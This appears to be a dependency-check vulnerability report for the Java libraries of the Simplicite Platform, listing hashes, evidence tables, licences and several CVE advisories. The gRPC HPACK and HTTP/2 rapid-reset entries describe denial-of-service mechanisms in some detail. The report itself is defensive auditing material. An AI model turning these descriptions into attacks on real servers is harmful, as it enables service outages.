SHA256: df61f1a1724aa674d922dce21965b907df8f77e730679ae1abe92679390a2fd6
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name ehcache-core High Vendor jar package name ehcache Highest Vendor jar package name net Highest Vendor jar package name sf Highest Vendor pom artifactid ehcache-core Highest Vendor pom artifactid ehcache-core Low Vendor pom groupid net.sf.ehcache Highest Vendor pom name Ehcache Core High Vendor pom parent-artifactid ehcache-parent Low Vendor pom url http://ehcache.org Highest Product file name ehcache-core High Product jar package name ehcache Highest Product jar package name net Highest Product jar package name sf Highest Product pom artifactid ehcache-core Highest Product pom groupid net.sf.ehcache Highest Product pom name Ehcache Core High Product pom parent-artifactid ehcache-parent Medium Product pom url http://ehcache.org Medium Version file version 2.6.2 High Version pom parent-version 2.6.2 Low Version pom version 2.6.2 Highest
ehcache-core-2.6.2.jar: sizeof-agent.jarFile Path: /var/simplicite/.m2/repository/net/sf/ehcache/ehcache-core/2.6.2/ehcache-core-2.6.2.jar/net/sf/ehcache/pool/sizeof/sizeof-agent.jarMD5: 5ad919b3ac0516897bdca079c9a222a8SHA1: e86399a80ae6a6c7a563717eaa0ce9ba4708571cSHA256: 3bcd560ca5f05248db9b689244b043e9c7549e3791281631a64e5dfff15870d2Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name sizeof-agent High Vendor jar package name ehcache Highest Vendor jar package name net Highest Vendor jar package name sf Highest Vendor Manifest hudson-build-number 6 Low Vendor Manifest hudson-project sizeof-agent_sizeof-agent-1.0.1_publisher Low Vendor Manifest jenkins-build-number 6 Low Vendor Manifest jenkins-project sizeof-agent_sizeof-agent-1.0.1_publisher Low Vendor pom artifactid sizeof-agent Low Vendor pom groupid net.sf.ehcache Highest Vendor pom name Ehcache Size-Of Agent High Vendor pom parent-artifactid ehcache-parent Low Vendor pom url http://www.ehcache.org Highest Product file name sizeof-agent High Product jar package name ehcache Highest Product jar package name net Highest Product jar package name sf Highest Product Manifest hudson-build-number 6 Low Product Manifest hudson-project sizeof-agent_sizeof-agent-1.0.1_publisher Low Product Manifest jenkins-build-number 6 Low Product Manifest jenkins-project sizeof-agent_sizeof-agent-1.0.1_publisher Low Product pom artifactid sizeof-agent Highest Product pom groupid net.sf.ehcache Highest Product pom name Ehcache Size-Of Agent High Product pom parent-artifactid ehcache-parent Medium Product pom url http://www.ehcache.org Medium Version pom parent-version 1.0.1 Low Version pom version 1.0.1 Highest
error_prone_annotations-2.3.2.jarLicense:
Apache 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/google/errorprone/error_prone_annotations/2.3.2/error_prone_annotations-2.3.2.jar
MD5: 42c8312a7eb4b6ff612049c4f7b514a6
SHA1: d1a0c5032570e0f64be6b4d9c90cdeb103129029
SHA256: 357cd6cfb067c969226c442451502aee13800a24e950fdfde77bcdb4565a668d
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name error_prone_annotations High Vendor jar package name annotations Highest Vendor jar package name annotations Low Vendor jar package name errorprone Highest Vendor jar package name errorprone Low Vendor jar package name google Highest Vendor jar package name google Low Vendor pom artifactid error_prone_annotations Highest Vendor pom artifactid error_prone_annotations Low Vendor pom groupid com.google.errorprone Highest Vendor pom name error-prone annotations High Vendor pom parent-artifactid error_prone_parent Low Product file name error_prone_annotations High Product jar package name annotations Highest Product jar package name annotations Low Product jar package name errorprone Highest Product jar package name errorprone Low Product jar package name google Highest Product pom artifactid error_prone_annotations Highest Product pom groupid com.google.errorprone Highest Product pom name error-prone annotations High Product pom parent-artifactid error_prone_parent Medium Version file version 2.3.2 High Version pom version 2.3.2 Highest
failureaccess-1.0.1.jarDescription:
Contains
com.google.common.util.concurrent.internal.InternalFutureFailureAccess and
InternalFutures. Most users will never need to use this artifact. Its
classes is conceptually a part of Guava, but they're in this separate
artifact so that Android libraries can use them without pulling in all of
Guava (just as they can use ListenableFuture by depending on the
listenablefuture artifact).
License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/google/guava/failureaccess/1.0.1/failureaccess-1.0.1.jar
MD5: 091883993ef5bfa91da01dcc8fc52236
SHA1: 1dcf1de382a0bf95a3d8b0849546c88bac1292c9
SHA256: a171ee4c734dd2da837e4b16be9df4661afab72a41adaf31eb84dfdaf936ca26
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name failureaccess High Vendor jar package name common Highest Vendor jar package name concurrent Highest Vendor jar package name google Highest Vendor jar package name util Highest Vendor Manifest bundle-docurl https://github.com/google/guava/ Low Vendor Manifest bundle-symbolicname com.google.guava.failureaccess Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor pom artifactid failureaccess Highest Vendor pom artifactid failureaccess Low Vendor pom groupid com.google.guava Highest Vendor pom name Guava InternalFutureFailureAccess and InternalFutures High Vendor pom parent-artifactid guava-parent Low Product file name failureaccess High Product jar package name common Highest Product jar package name concurrent Highest Product jar package name google Highest Product jar package name util Highest Product Manifest bundle-docurl https://github.com/google/guava/ Low Product Manifest Bundle-Name Guava InternalFutureFailureAccess and InternalFutures Medium Product Manifest bundle-symbolicname com.google.guava.failureaccess Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product pom artifactid failureaccess Highest Product pom groupid com.google.guava Highest Product pom name Guava InternalFutureFailureAccess and InternalFutures High Product pom parent-artifactid guava-parent Medium Version file version 1.0.1 High Version Manifest Bundle-Version 1.0.1 High Version pom parent-version 1.0.1 Low Version pom version 1.0.1 Highest
fast-and-simple-minify-1.0.jarDescription:
fast-and-simple-minify is a combined java-port of the JSMin and CSSMin utility with some additional features License:
The Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/ch/simschla/fast-and-simple-minify/1.0/fast-and-simple-minify-1.0.jar
MD5: 762fd1d990bb4e97a7581d2cd3255fc1
SHA1: ade6ae013ee38869b79eeb0661203451ddc16f46
SHA256: 86e94527a0705c1ac20ff2b80e7d673975cc92f988210cc440f5bd1bb44087b5
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name fast-and-simple-minify High Vendor jar package name ch Highest Vendor jar package name ch Low Vendor jar package name minify Highest Vendor jar package name minify Low Vendor jar package name simschla Highest Vendor jar package name simschla Low Vendor pom artifactid fast-and-simple-minify Highest Vendor pom artifactid fast-and-simple-minify Low Vendor pom developer email github@survive.ch Low Vendor pom developer name Simon Schlachter Medium Vendor pom groupid ch.simschla Highest Vendor pom name fast-and-simple-minify High Vendor pom url simschla/fast-and-simple-minify Highest Product file name fast-and-simple-minify High Product jar package name ch Highest Product jar package name minify Highest Product jar package name minify Low Product jar package name simschla Highest Product jar package name simschla Low Product pom artifactid fast-and-simple-minify Highest Product pom developer email github@survive.ch Low Product pom developer name Simon Schlachter Low Product pom groupid ch.simschla Highest Product pom name fast-and-simple-minify High Product pom url simschla/fast-and-simple-minify High Version file version 1.0 High Version pom version 1.0 Highest
firebase-admin-6.10.0.jarDescription:
This is the official Firebase Admin Java SDK. Build extraordinary native JVM apps in
minutes with Firebase. The Firebase platform can power your app’s backend, user
authentication, static hosting, and more.
License:
Apache License, Version 2.0: https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/google/firebase/firebase-admin/6.10.0/firebase-admin-6.10.0.jar
MD5: 2e4f38074123d07a7b5ada38532bc1ef
SHA1: 67e5c43ca7e06f6d5c00f4c02aeabaaaed2efcaf
SHA256: 74f681266b4e87d3b9c356d37773d0b6da6963f7c939eafc2622f2df7f2426cd
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name firebase-admin High Vendor jar package name database Low Vendor jar package name firebase Highest Vendor jar package name firebase Low Vendor jar package name google Highest Vendor jar package name google Low Vendor pom artifactid firebase-admin Highest Vendor pom artifactid firebase-admin Low Vendor pom developer id firebase Medium Vendor pom developer name Firebase Medium Vendor pom developer org Firebase Medium Vendor pom developer org URL https://firebase.google.com/ Medium Vendor pom groupid com.google.firebase Highest Vendor pom name firebase-admin High Vendor pom organization name Firebase High Vendor pom organization url https://firebase.google.com/ Medium Vendor pom url https://firebase.google.com/ Highest Product file name firebase-admin High Product jar package name database Low Product jar package name firebase Highest Product jar package name firebase Low Product jar package name google Highest Product pom artifactid firebase-admin Highest Product pom developer id firebase Low Product pom developer name Firebase Low Product pom developer org Firebase Low Product pom developer org URL https://firebase.google.com/ Low Product pom groupid com.google.firebase Highest Product pom name firebase-admin High Product pom organization name Firebase Low Product pom organization url https://firebase.google.com/ Low Product pom url https://firebase.google.com/ Medium Version file version 6.10.0 High Version pom version 6.10.0 Highest
fontbox-2.0.16.jarDescription:
The Apache FontBox library is an open source Java tool to obtain low level information
from font files. FontBox is a subproject of Apache PDFBox.
License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/pdfbox/fontbox/2.0.16/fontbox-2.0.16.jar
MD5: 08bfafc724b3ac2682a8cac0dccedc5d
SHA1: 3f7819279a0b90a01b07a870d1d27dffd8de24db
SHA256: a0934197824808d612d494cac653256f2877665607cd63313ceecefb15479f9c
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name fontbox High Vendor jar package name apache Highest Vendor jar package name fontbox Highest Vendor Manifest bundle-docurl http://pdfbox.apache.org Low Vendor Manifest bundle-symbolicname org.apache.pdfbox.fontbox Medium Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.pdfbox Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid fontbox Highest Vendor pom artifactid fontbox Low Vendor pom groupid org.apache.pdfbox Highest Vendor pom name Apache FontBox High Vendor pom parent-artifactid pdfbox-parent Low Vendor pom url http://pdfbox.apache.org/ Highest Product file name fontbox High Product jar package name apache Highest Product jar package name fontbox Highest Product Manifest bundle-docurl http://pdfbox.apache.org Low Product Manifest Bundle-Name Apache FontBox Medium Product Manifest bundle-symbolicname org.apache.pdfbox.fontbox Medium Product Manifest Implementation-Title Apache FontBox High Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product Manifest specification-title Apache FontBox Medium Product pom artifactid fontbox Highest Product pom groupid org.apache.pdfbox Highest Product pom name Apache FontBox High Product pom parent-artifactid pdfbox-parent Medium Product pom url http://pdfbox.apache.org/ Medium Version file version 2.0.16 High Version Manifest Bundle-Version 2.0.16 High Version Manifest Implementation-Version 2.0.16 High Version pom version 2.0.16 Highest
fuzzywuzzy-1.2.0.jar (shaded: me.xdrop:diffutils:1.3)File Path: /var/simplicite/.m2/repository/me/xdrop/fuzzywuzzy/1.2.0/fuzzywuzzy-1.2.0.jar/META-INF/maven/me.xdrop/diffutils/pom.xmlMD5: 9d75ff06b99ebf130bb19c8e085714b2SHA1: edcb90cdd072a9291d9580eb01656c925a73cdadSHA256: 8f44a4acb88339f7d9d858d504a8f88d268e4fc6094d0e55f8918227b87709bfReferenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor pom artifactid diffutils Low Vendor pom groupid me.xdrop Highest Vendor pom name diffutils High Product pom artifactid diffutils Highest Product pom groupid me.xdrop Highest Product pom name diffutils High Version pom version 1.3 Highest
fuzzywuzzy-1.2.0.jar (shaded: me.xdrop:fuzzywuzzy-build:1.2.0)Description:
Fuzzy string matching algorithm for Java License:
GPL 3: https://www.gnu.org/licenses/gpl-3.0.en.html File Path: /var/simplicite/.m2/repository/me/xdrop/fuzzywuzzy/1.2.0/fuzzywuzzy-1.2.0.jar/META-INF/maven/me.xdrop/fuzzywuzzy-build/pom.xml
MD5: 2a5e2854f7988a80a8a330974aa5e902
SHA1: 891dbaecca3f458a52fce228b51c57484f59cfdd
SHA256: e753798e0432312938244be64770e03bef34e80a846b5b562169d03c60073f5f
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor pom artifactid fuzzywuzzy-build Low Vendor pom developer id xdrop Medium Vendor pom developer name Panayiotis P Medium Vendor pom groupid me.xdrop Highest Vendor pom name fuzzywuzzy - build High Product pom artifactid fuzzywuzzy-build Highest Product pom developer id xdrop Low Product pom developer name Panayiotis P Low Product pom groupid me.xdrop Highest Product pom name fuzzywuzzy - build High Version pom version 1.2.0 Highest
fuzzywuzzy-1.2.0.jarDescription:
Fuzzy string searching implementation of the well-known fuzzywuzzy algorithm in Java License:
GPL 3: https://www.gnu.org/licenses/gpl-3.0.en.html File Path: /var/simplicite/.m2/repository/me/xdrop/fuzzywuzzy/1.2.0/fuzzywuzzy-1.2.0.jar
MD5: 391d380c3bc51b5be6985f4ddf642863
SHA1: 34d50f9d23e37e713f30d9342e0a7285dc9c7df1
SHA256: 57952aee71092345e41b7c047dd48eb1700c642afdc3fc7d57a583bc57fb43c6
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name fuzzywuzzy High Vendor jar package name fuzzywuzzy Highest Vendor jar package name fuzzywuzzy Low Vendor jar package name me Highest Vendor jar package name me Low Vendor jar package name xdrop Highest Vendor jar package name xdrop Low Vendor pom artifactid fuzzywuzzy Highest Vendor pom artifactid fuzzywuzzy Low Vendor pom developer id xdrop Medium Vendor pom developer name Panayiotis P Medium Vendor pom groupid me.xdrop Highest Vendor pom name fuzzywuzzy High Vendor pom url xdrop/fuzzywuzzy Highest Product file name fuzzywuzzy High Product jar package name fuzzywuzzy Highest Product jar package name fuzzywuzzy Low Product jar package name me Highest Product jar package name xdrop Highest Product jar package name xdrop Low Product pom artifactid fuzzywuzzy Highest Product pom developer id xdrop Low Product pom developer name Panayiotis P Low Product pom groupid me.xdrop Highest Product pom name fuzzywuzzy High Product pom url xdrop/fuzzywuzzy High Version file version 1.2.0 High Version pom version 1.2.0 Highest
gax-1.48.1.jarDescription:
Google Api eXtensions for Java License:
BSD: https://github.com/googleapis/gax-java/blob/master/LICENSE File Path: /var/simplicite/.m2/repository/com/google/api/gax/1.48.1/gax-1.48.1.jar
MD5: a2c0b2ba35a3d01e5ac65f3342c59503
SHA1: 77d7d0173ba203c742198be87aeca88000b6572c
SHA256: 57c73aef9d54a63e483274712f7aa3957bc8f42721695ef9d562a7e13ba1fc51
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name gax High Vendor jar package name api Highest Vendor jar package name gax Highest Vendor jar package name google Highest Vendor Manifest Implementation-Vendor Google High Vendor Manifest specification-vendor Google Low Vendor pom artifactid gax Highest Vendor pom artifactid gax Low Vendor pom developer email googleapis@googlegroups.com Low Vendor pom developer id GoogleAPIs Medium Vendor pom developer name GoogleAPIs Medium Vendor pom developer org Google LLC Medium Vendor pom developer org URL https://www.google.com Medium Vendor pom groupid com.google.api Highest Vendor pom name GAX (Google Api eXtensions) for Java High Vendor pom url googleapis/gax-java Highest Product file name gax High Product jar package name api Highest Product jar package name gax Highest Product jar package name google Highest Product Manifest Implementation-Title gax High Product Manifest specification-title gax Medium Product pom artifactid gax Highest Product pom developer email googleapis@googlegroups.com Low Product pom developer id GoogleAPIs Low Product pom developer name GoogleAPIs Low Product pom developer org Google LLC Low Product pom developer org URL https://www.google.com Low Product pom groupid com.google.api Highest Product pom name GAX (Google Api eXtensions) for Java High Product pom url googleapis/gax-java High Version file version 1.48.1 High Version Manifest Implementation-Version 1.48.1 High Version pom version 1.48.1 Highest
gax-grpc-1.48.1.jarDescription:
Google Api eXtensions for Java License:
BSD: https://github.com/googleapis/gax-java/blob/master/LICENSE File Path: /var/simplicite/.m2/repository/com/google/api/gax-grpc/1.48.1/gax-grpc-1.48.1.jar
MD5: 048f54857c12b4afc27595134fa5092b
SHA1: bd1208b661754c7d00774a7e180c7d32adbf177d
SHA256: b049f4c40807095d48936807ffe876df8c76dd9acbae530f428c2ddbfe1ed891
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name gax-grpc High Vendor jar package name api Highest Vendor jar package name gax Highest Vendor jar package name google Highest Vendor jar package name grpc Highest Vendor Manifest Implementation-Vendor Google High Vendor Manifest specification-vendor Google Low Vendor pom artifactid gax-grpc Highest Vendor pom artifactid gax-grpc Low Vendor pom developer email googleapis@googlegroups.com Low Vendor pom developer id GoogleAPIs Medium Vendor pom developer name GoogleAPIs Medium Vendor pom developer org Google LLC Medium Vendor pom developer org URL https://www.google.com Medium Vendor pom groupid com.google.api Highest Vendor pom name GAX (Google Api eXtensions) for Java High Vendor pom url googleapis/gax-java Highest Product file name gax-grpc High Product jar package name api Highest Product jar package name gax Highest Product jar package name google Highest Product jar package name grpc Highest Product Manifest Implementation-Title gax-grpc High Product Manifest specification-title gax-grpc Medium Product pom artifactid gax-grpc Highest Product pom developer email googleapis@googlegroups.com Low Product pom developer id GoogleAPIs Low Product pom developer name GoogleAPIs Low Product pom developer org Google LLC Low Product pom developer org URL https://www.google.com Low Product pom groupid com.google.api Highest Product pom name GAX (Google Api eXtensions) for Java High Product pom url googleapis/gax-java High Version file version 1.48.1 High Version Manifest Implementation-Version 1.48.1 High Version pom version 1.48.1 Highest
CVE-2023-33953 suppress
gRPC contains a vulnerability that allows hpack table accounting errors could lead to unwanted disconnects between clients and servers in exceptional cases/ Three vectors were found that allow the following DOS attacks:
- Unbounded memory buffering in the HPACK parser
- Unbounded CPU consumption in the HPACK parser
The unbounded CPU consumption is down to a copy that occurred per-input-block in the parser, and because that could be unbounded due to the memory copy bug we end up with an O(n^2) parsing loop, with n selected by the client.
The unbounded memory buffering bugs:
- The header size limit check was behind the string reading code, so we needed to first buffer up to a 4 gigabyte string before rejecting it as longer than 8 or 16kb.
- HPACK varints have an encoding quirk whereby an infinite number of 0’s can be added at the start of an integer. gRPC’s hpack parser needed to read all of them before concluding a parse.
- gRPC’s metadata overflow check was performed per frame, so that the following sequence of frames could cause infinite buffering: HEADERS: containing a: 1 CONTINUATION: containing a: 2 CONTINUATION: containing a: 3 etc… CWE-834 Excessive Iteration, CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2023-44487 suppress
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2023-4785 suppress
Lack of error handling in the TCP server in Google's gRPC starting version 1.23 on posix-compatible platforms (ex. Linux) allows an attacker to cause a denial of service by initiating a significant number of connections with the server. Note that gRPC C++ Python, and Ruby are affected, but gRPC Java, and Go are NOT affected. NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2023-32732 suppress
gRPC contains a vulnerability whereby a client can cause a termination of connection between a HTTP2 proxy and a gRPC server: a base64 encoding error for `-bin` suffixed headers will result in a disconnection by the gRPC server, but is typically allowed by HTTP2 proxies. We recommend upgrading beyond the commit in https://github.com/grpc/grpc/pull/32309 https://www.google.com/url
NVD-CWE-Other
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L References:
Vulnerable Software & Versions:
gax-httpjson-0.65.1.jarDescription:
Google Api eXtensions for Java License:
BSD: https://github.com/googleapis/gax-java/blob/master/LICENSE File Path: /var/simplicite/.m2/repository/com/google/api/gax-httpjson/0.65.1/gax-httpjson-0.65.1.jar
MD5: 3c31f1745d5e36df49b38a062407b4af
SHA1: b3b2ce027a50cef2057195876dcb1a577cfe37fa
SHA256: 7b2aa4ccbc0a3691c36ad93c4e6dbc9080830d3c1322e5cccb4af85284dc76e2
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name gax-httpjson High Vendor jar package name api Highest Vendor jar package name gax Highest Vendor jar package name google Highest Vendor jar package name httpjson Highest Vendor Manifest Implementation-Vendor Google High Vendor Manifest specification-vendor Google Low Vendor pom artifactid gax-httpjson Highest Vendor pom artifactid gax-httpjson Low Vendor pom developer email googleapis@googlegroups.com Low Vendor pom developer id GoogleAPIs Medium Vendor pom developer name GoogleAPIs Medium Vendor pom developer org Google LLC Medium Vendor pom developer org URL https://www.google.com Medium Vendor pom groupid com.google.api Highest Vendor pom name GAX (Google Api eXtensions) for Java High Vendor pom url googleapis/gax-java Highest Product file name gax-httpjson High Product jar package name api Highest Product jar package name gax Highest Product jar package name google Highest Product jar package name httpjson Highest Product Manifest Implementation-Title gax-httpjson High Product Manifest specification-title gax-httpjson Medium Product pom artifactid gax-httpjson Highest Product pom developer email googleapis@googlegroups.com Low Product pom developer id GoogleAPIs Low Product pom developer name GoogleAPIs Low Product pom developer org Google LLC Low Product pom developer org URL https://www.google.com Low Product pom groupid com.google.api Highest Product pom name GAX (Google Api eXtensions) for Java High Product pom url googleapis/gax-java High Version file version 0.65.1 High Version Manifest Implementation-Version 0.65.1 High Version pom version 0.65.1 Highest
CVE-2022-45688 suppress
A stack overflow in the XML.toJSONObject component of hutool-json v5.8.10 allows attackers to cause a Denial of Service (DoS) via crafted JSON or XML data. CWE-787 Out-of-bounds Write
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2023-5072 suppress
Denial of Service in JSON-Java versions up to and including 20230618. A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used.
CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
geoapi-3.0.1.jarDescription:
The development community in building GIS solutions is sustaining an enormous level
of effort. The GeoAPI project aims to reduce duplication and increase interoperability
by providing neutral, interface-only APIs derived from OGC/ISO Standards.
License:
https://raw.githubusercontent.com/opengeospatial/geoapi/master/LICENSE.txt File Path: /var/simplicite/.m2/repository/org/opengis/geoapi/3.0.1/geoapi-3.0.1.jar
MD5: fa9a86892774b94b2bde0446ebbebd62
SHA1: a69b261841b0794b82b8d42fcd6e9a370eb62809
SHA256: ca1dfeba112d0dea575c7abba76a8ecd6ea7818e508de964302a9cfc4779b837
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name geoapi High Vendor jar package name opengis Highest Vendor Manifest bundle-docurl http://www.geoapi.org Low Vendor Manifest bundle-symbolicname org.opengis.geoapi Medium Vendor Manifest implementation-url http://www.geoapi.org Low Vendor Manifest Implementation-Vendor The GeoAPI project High Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor Manifest specification-vendor Open Geospatial Consortium Low Vendor pom artifactid geoapi Highest Vendor pom artifactid geoapi Low Vendor pom developer email martin.desruisseaux@geomatys.fr Low Vendor pom developer id desruisseaux Medium Vendor pom developer name Martin Desruisseaux Medium Vendor pom developer org Geomatys Medium Vendor pom developer org URL http://www.geomatys.com Medium Vendor pom groupid org.opengis Highest Vendor pom name GeoAPI High Vendor pom parent-artifactid geoapi-parent Low Product file name geoapi High Product jar package name opengis Highest Product Manifest bundle-docurl http://www.geoapi.org Low Product Manifest Bundle-Name GeoAPI Medium Product Manifest bundle-symbolicname org.opengis.geoapi Medium Product Manifest implementation-url http://www.geoapi.org Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product Manifest specification-title GeoAPI Medium Product pom artifactid geoapi Highest Product pom developer email martin.desruisseaux@geomatys.fr Low Product pom developer id desruisseaux Low Product pom developer name Martin Desruisseaux Low Product pom developer org Geomatys Low Product pom developer org URL http://www.geomatys.com Low Product pom groupid org.opengis Highest Product pom name GeoAPI High Product pom parent-artifactid geoapi-parent Medium Version file version 3.0.1 High Version Manifest Bundle-Version 3.0.1 High Version Manifest specification-version 3.0.1 High Version pom version 3.0.1 Highest
google-api-client-1.30.3.jarDescription:
The Google API Client Library for Java provides functionality common to all Google APIs; for example HTTP transport, error handling, authentication, JSON parsing, media download/upload, and batching. License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/google/api-client/google-api-client/1.30.3/google-api-client-1.30.3.jar
MD5: 20c6528b490e6ff39013a71f5a2bd855
SHA1: 5eb3dab97d9cc6de9065f5d21e4513597336c04a
SHA256: da89326bd0eb9b8a355e5b87090bf201cb1eed4e734fc60cdb8cbab31904dd8c
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name google-api-client High Vendor jar package name api Highest Vendor jar package name client Highest Vendor jar package name google Highest Vendor jar package name googleapis Highest Vendor Manifest automatic-module-name google.api.client Medium Vendor Manifest build-jdk-spec 1.8 Low Vendor Manifest bundle-docurl https://developers.google.com/api-client-library/java/ Low Vendor Manifest bundle-symbolicname com.google.api.client.googleapis Medium Vendor Manifest Implementation-Vendor Google High Vendor Manifest Implementation-Vendor-Id com.google.api-client Medium Vendor Manifest originally-created-by Apache Maven Bundle Plugin Low Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor pom artifactid google-api-client Highest Vendor pom artifactid google-api-client Low Vendor pom groupid com.google.api-client Highest Vendor pom name Google APIs Client Library for Java High Vendor pom parent-artifactid google-api-client-parent Low Product file name google-api-client High Product jar package name api Highest Product jar package name client Highest Product jar package name google Highest Product jar package name googleapis Highest Product Manifest automatic-module-name google.api.client Medium Product Manifest build-jdk-spec 1.8 Low Product Manifest bundle-docurl https://developers.google.com/api-client-library/java/ Low Product Manifest Bundle-Name Google APIs Client Library for Java Medium Product Manifest bundle-symbolicname com.google.api.client.googleapis Medium Product Manifest Implementation-Title Google APIs Client Library for Java High Product Manifest originally-created-by Apache Maven Bundle Plugin Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product pom artifactid google-api-client Highest Product pom groupid com.google.api-client Highest Product pom name Google APIs Client Library for Java High Product pom parent-artifactid google-api-client-parent Medium Version file version 1.30.3 High Version Manifest Bundle-Version 1.30.3 High Version Manifest Implementation-Version 1.30.3 High Version pom version 1.30.3 Highest
google-api-client-gson-1.30.3.jarDescription:
GSON extensions to the Google APIs Client Library for Java License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/google/api-client/google-api-client-gson/1.30.3/google-api-client-gson-1.30.3.jar
MD5: e8caae672593d93434fc2d2b0eb3b032
SHA1: cb5dbf9d006dabfb2c75693b3650a6f16c939556
SHA256: e9a5f6d4ae65bc8e93633904830eae39291b4f6f338377caad3534a6274536da
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name google-api-client-gson High Vendor jar package name api Highest Vendor jar package name client Highest Vendor jar package name google Highest Vendor jar package name googleapis Highest Vendor Manifest automatic-module-name google.api.client.gson Medium Vendor Manifest build-jdk-spec 1.8 Low Vendor Manifest bundle-docurl https://googleapis.dev/java/google-api-client/1.30.3/index.html Low Vendor Manifest bundle-symbolicname com.google.api.client.googleapis.notifications.json.gson Medium Vendor Manifest Implementation-Vendor Google High Vendor Manifest Implementation-Vendor-Id com.google.api-client Medium Vendor Manifest originally-created-by Apache Maven Bundle Plugin Low Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor pom artifactid google-api-client-gson Highest Vendor pom artifactid google-api-client-gson Low Vendor pom groupid com.google.api-client Highest Vendor pom name GSON extensions to the Google APIs Client Library for Java High Vendor pom parent-artifactid google-api-client-parent Low Product file name google-api-client-gson High Product jar package name api Highest Product jar package name client Highest Product jar package name google Highest Product jar package name googleapis Highest Product Manifest automatic-module-name google.api.client.gson Medium Product Manifest build-jdk-spec 1.8 Low Product Manifest bundle-docurl https://googleapis.dev/java/google-api-client/1.30.3/index.html Low Product Manifest Bundle-Name GSON extensions to the Google APIs Client Library for Java Medium Product Manifest bundle-symbolicname com.google.api.client.googleapis.notifications.json.gson Medium Product Manifest Implementation-Title GSON extensions to the Google APIs Client Library for Java High Product Manifest originally-created-by Apache Maven Bundle Plugin Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product pom artifactid google-api-client-gson Highest Product pom groupid com.google.api-client Highest Product pom name GSON extensions to the Google APIs Client Library for Java High Product pom parent-artifactid google-api-client-parent Medium Version file version 1.30.3 High Version Manifest Bundle-Version 1.30.3 High Version Manifest Implementation-Version 1.30.3 High Version pom version 1.30.3 Highest
CVE-2022-45688 suppress
A stack overflow in the XML.toJSONObject component of hutool-json v5.8.10 allows attackers to cause a Denial of Service (DoS) via crafted JSON or XML data. CWE-787 Out-of-bounds Write
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2023-5072 suppress
